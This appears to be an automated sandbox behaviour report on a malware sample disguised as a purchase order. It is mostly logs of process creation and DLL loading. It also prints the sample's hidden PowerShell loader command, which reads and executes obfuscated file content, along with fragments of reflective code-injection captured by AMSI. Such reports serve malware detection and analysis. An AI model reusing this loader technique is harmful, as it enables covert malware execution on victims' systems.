              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: PO-USC-22USC-KonchoCo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006FBD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.3490237791.00000000080E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000001.00000002.3490629462.000000000C710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Cistercian $Kautioners $Resedaen), (Blanketweed @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:contentable = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Zelotens)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Steelified, $false).DefineType($Huggeblokkene, $
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_043529A1 push cs; retf 0007h1_2_043529A2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04351BA4 push edi; iretd 1_2_04351BAB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_070469D4 push es; ret 1_2_070469DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A424A5 push FFFFFFA0h; ret 1_2_08A424A7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A442F2 push edx; retf 1_2_08A442F4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A45AC2 push 00000064h; ret 1_2_08A45AC5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A448C8 push ss; iretd 1_2_08A448CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A42C2F push 00000002h; iretd 1_2_08A42C31
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A4602A push cs; retf 1_2_08A4602B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A44411 push ds; iretd 1_2_08A44407
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A44075 push es; iretd 1_2_08A4416D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A43D99 push ebp; iretd 1_2_08A43DA2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A44327 push ds; iretd 1_2_08A44407
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A44302 push ds; iretd 1_2_08A44407
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A43F57 pushfd ; ret 1_2_08A43F58
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08A44151 push es; iretd 1_2_08A4416D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04064411 push ds; iretd 9_2_04064407
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04062C2F push 00000002h; iretd 9_2_04062C31
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0406602A push cs; retf 9_2_0406602B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04064075 push es; iretd 9_2_0406416D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_040624A5 push FFFFFFA0h; ret 9_2_040624A7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04065AC2 push 00000064h; ret 9_2_04065AC5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_040648C8 push ss; iretd 9_2_040648CA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_040642F2 push edx; retf 9_2_040642F4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04064302 push ds; iretd 9_2_04064407
